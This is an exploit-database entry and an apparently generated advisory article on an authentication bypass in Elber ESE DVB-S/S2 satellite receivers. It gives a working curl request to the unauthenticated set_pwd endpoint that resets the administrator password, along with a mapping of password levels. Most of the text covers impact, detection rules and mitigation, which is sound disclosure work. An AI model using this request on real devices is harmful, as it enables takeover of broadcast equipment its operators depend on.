Elber ESE DVB-S/S2 Satellite Receiver 1.5.x - Authentication Bypass

Exploit Author: LiquidWorm Analysis Author: www.bubbleslearn.ir Category: WebApps Language: JavaScript Published Date: 2024-08-24 
Elber ESE DVB-S/S2 Satellite Receiver 1.5.x Authentication Bypass


Vendor: Elber S.r.l.
Product web page: https://www.elber.it
Affected version: 1.5.179 Revision 904
                  1.5.56 Revision 884
                  1.229 Revision 440

Summary: ESE (Elber Satellite Equipment) product line, designed for the
high-end radio contribution and distribution market, where quality and
reliability are most important. The Elber IRD (Integrated Receiver Decoder)
ESE-01 offers a professional audio quality (and composite video) at an
excellent quality/price ratio. The development of digital satellite contribution
networks and the need to connect a large number of sites require a cheap
but reliable and performing satellite receiver with integrated decoder.

Desc: The device suffers from an authentication bypass vulnerability through
a direct and unauthorized access to the password management functionality. The
issue allows attackers to bypass authentication by manipulating the set_pwd
endpoint that enables them to overwrite the password of any user within the
system. This grants unauthorized and administrative access to protected areas
of the application compromising the device's system security.

--------------------------------------------------------------------------
/modules/pwd.html
------------------
50: function apply_pwd(level, pwd)
51: {
52: $.get("json_data/set_pwd", {lev:level, pass:pwd},
53: function(data){
54: //$.alert({title:'Operation',text:data});
55: show_message(data);
56: }).fail(function(error){
57: show_message('Error ' + error.status, 'error');
58: });
59: }

--------------------------------------------------------------------------

Tested on: NBFM Controller
           embOS/IP


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2024-5820
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5820.php


18.08.2023

--


$ curl -s http://[TARGET]/json_data/set_pwd?lev=2&pass=admin1234

Ref (lev param):

Level 7 = SNMP Write Community (snmp_write_pwd)
Level 6 = SNMP Read Community (snmp_read_pwd)
Level 5 = Custom Password? hidden. (custom_pwd)
Level 4 = Display Password (display_pwd)?
Level 2 = Administrator Password (admin_pwd)
Level 1 = Super User Password (puser_pwd)
Level 0 = User Password (user_pwd)


Elber ESE DVB-S/S2 Satellite Receiver 1.5.x — Authentication Bypass (set_pwd)

This article explains an authentication bypass vulnerability affecting Elber ESE DVB-S/S2 satellite receivers running firmware in the 1.5.x and related branches. It covers technical details, impact, detection and testing (for administrators), and practical mitigations and remediation advice for operators and security teams.

Summary

Several Elber ESE IRD devices expose a password-management endpoint that can be invoked without prior authentication. By calling the web endpoint /json_data/set_pwd with crafted parameters an unauthenticated attacker can overwrite passwords for different user levels, including administrative accounts. This effectively grants unauthorized privileged access to the device and its management interface.

Vulnerable products and versions

  • Vendor: Elber S.r.l. (ESE — Elber Satellite Equipment)
  • Affected versions observed: 1.5.179 (Revision 904), 1.5.56 (Revision 884), 1.229 (Revision 440)
  • Advisory: ZSL-2024-5820 (disclosed by Gjoko 'LiquidWorm' Krstic / ZeroScience)

Technical details

The device’s web UI includes client-side JavaScript that calls an unauthenticated server-side route:

function apply_pwd(level, pwd)
{
$.get("json_data/set_pwd", {lev:level, pass:pwd},
function(data){
show_message(data);
}).fail(function(error){
show_message('Error ' + error.status, 'error');
});
}

Explanation: This JavaScript function issues an HTTP GET request to json_data/set_pwd with parameters lev and pass. The lev parameter selects which internal password variable to modify (e.g., admin password, user password, SNMP community), and pass supplies the new password. The server-side handler does not enforce authentication/authorization, enabling a remote caller to reset passwords directly.

Parameter mapping (observed)

lev valueMeaning
7SNMP Write Community (snmp_write_pwd)
6SNMP Read Community (snmp_read_pwd)
5Custom password (custom_pwd) — hidden/unknown UI
4Display Password (display_pwd)
2Administrator Password (admin_pwd)
1Super User Password (puser_pwd)
0User Password (user_pwd)

Proof-of-concept (administrative testing)

The following cURL example demonstrates how an unauthenticated request can set the administrator password. Only run such tests on equipment you own or are authorized to test.

curl -s "http://TARGET/json_data/set_pwd?lev=2&pass=NewAdminPass123"

Explanation: This GET request targets the set_pwd endpoint, specifying lev=2 to indicate the administrator password and pass with the new password value. A successful call will typically return a confirmation string and will change the stored admin password.

Important caution: Resetting an admin password remotely can lock out legitimate administrators or disrupt device operation. Perform tests only in controlled environments and document changes so you can restore the original state.

Impact and risk

  • Complete administrative takeover: An unauthenticated attacker can set or reset administrative credentials and then access any management functionality exposed by the device.
  • Operational disruption: Unauthorized configuration changes can disrupt receiver operation, scheduled tasks, or service delivery.
  • Supply chain / pivot risk: These are professional broadcast devices often deployed in critical media and distribution networks — compromise may allow lateral movement into media networks or manipulation of content streams.
  • SNMP exposure: Ability to change SNMP communities allows attackers to exfiltrate operational data or change monitored parameters.

Detection and indicators

  • Web server logs: Unauthenticated HTTP GET requests to /json_data/set_pwd or similar json_data endpoints with lev and pass parameters.
  • Unexpected account lockouts or credential changes noted by operators.
  • Changes in configuration timestamps, firmware parameters, or SNMP communities without authorized change tickets.
  • Network IDS/IPS rules triggering on requests that set credentials or on uncommon GET parameter patterns targeting management URIs.

Mitigation and recommended actions

  • Immediate: Block external access to the device’s management interface. Place the device management ports (HTTP/HTTPS, SNMP) behind a firewall and allow access only from management subnets or trusted jump hosts.
  • Credential rotation: If you suspect compromise, perform credential rotation for all affected accounts (users, admin, SNMP) and any accounts that may share passwords.
  • Monitoring: Add logging/alerts for any requests to /json_data/set_pwd and similar endpoints. Review historical logs for such calls.
  • Network segmentation: Keep IRDs and broadcast devices on isolated management VLANs with strict ACLs to prevent lateral movement.
  • Apply vendor fixes: Contact Elber (https://www.elber.it) for patched firmware or vendor guidance. If an official patch is available, schedule and apply it following change control procedures.
  • Temporary workarounds:
    • Restrict HTTP access with firewall rules or an inline reverse proxy that enforces authentication before forwarding requests to the device.
    • Use an HTTP Basic Auth layer or VPN to limit access to only authenticated administrators if the device cannot be patched immediately.
    • Deploy a web application firewall (WAF) rule to block requests whose path or parameters match the set_pwd pattern.
  • Harden device configuration: Disable unused services (e.g., remote web management, SNMP) where possible. Replace default credentials and document access policies.

Responsible disclosure and timeline

The vulnerability was disclosed by Gjoko 'LiquidWorm' Krstic and published via ZeroScience (Advisory ID ZSL-2024-5820). Operators should check vendor channels for vendor-confirmed advisories and firmware updates. If you are an operator who discovers exploitation attempts, coordinate with your vendor and follow incident response procedures.

Detection rule examples

Example Snort/Suricata signature (conceptual) to detect attempts to set passwords via this endpoint:

alert tcp any any -> $HOME_NET 80 (msg:"ESE set_pwd password change attempt"; flow:to_server,established; uricontent:"/json_data/set_pwd"; http_uri; content:"lev="; http_client_body; sid:1000001; rev:1;)

Explanation: This rule triggers on HTTP requests that include the /json_data/set_pwd URI and a lev parameter. Tune source/destination addresses, ports, and testing before deploying to production to reduce false positives.

Incident response checklist

  • Isolate affected devices from untrusted networks.
  • Collect logs (web server, network, syslog) around suspected timeframe.
  • Rotate all credentials changed or potentially exposed.
  • Re-image or restore devices from known-good backups if unauthorized changes are detected.
  • Coordinate with vendor support for forensic guidance and firmware updates.
  • Notify stakeholders and document root cause, mitigation, and follow-up actions.

Concluding guidance

This vulnerability highlights the importance of minimizing direct exposure of management interfaces for embedded and broadcast devices, enforcing authentication at the server-side, and applying defense-in-depth controls (network segmentation, logging, access control). Operators of Elber ESE devices should treat this issue as high priority: restrict access, monitor for exploitation attempts, and apply vendor-provided fixes when available.